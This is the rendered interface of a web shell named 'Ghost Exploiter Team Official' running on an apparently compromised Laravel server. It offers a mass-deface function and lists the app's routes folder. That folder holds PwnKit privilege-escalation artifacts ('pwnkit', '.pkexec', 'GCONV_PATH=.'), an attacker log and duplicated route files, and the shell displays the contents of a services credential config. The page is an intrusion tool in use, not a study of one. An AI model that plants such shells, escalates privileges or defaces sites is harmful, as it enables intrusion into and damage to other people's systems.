Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
routes
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.pkexec
--
ren
GCONV_PATH=.
--
ren
api
--
ren
.mad-root
0KB
edt
ren
api-20260128021042.php
1.377KB
edt
ren
api.php
1.377KB
edt
ren
app.php
4.229KB
edt
ren
auth.php
3.935KB
edt
ren
console-20260128030632.php
0.36KB
edt
ren
console-20260128033331.php
0.36KB
edt
ren
console.php
0.36KB
edt
ren
contragents.php
0.699KB
edt
ren
dictionaries.php
1.031KB
edt
ren
integrations.php
0.694KB
edt
ren
payments.php
1.709KB
edt
ren
pwnkit
10.992KB
edt
ren
samurai_activity.log
0.208KB
edt
ren
services.php
1.011KB
edt
ren
users.php
0.828KB
edt
ren
web-20260128003557.php
0.112KB
edt
ren
web.php
0.112KB
edt
ren
<?php return [ /* |-------------------------------------------------------------------------- | Third Party Services |-------------------------------------------------------------------------- | | This file is for storing the credentials for third party services such | as Mailgun, Postmark, AWS and more. This file provides the de facto | location for this type of information, allowing packages to have | a conventional file to locate the various service credentials. | */ 'postmark' => [ 'token' => env('POSTMARK_TOKEN'), ], 'ses' => [ 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), ], 'resend' => [ 'key' => env('RESEND_KEY'), ], 'slack' => [ 'notifications' => [ 'bot_user_oauth_token' => env('SLACK_BOT_USER_OAUTH_TOKEN'), 'channel' => env('SLACK_BOT_USER_DEFAULT_CHANNEL'), ], ], ];
<=Back
Liking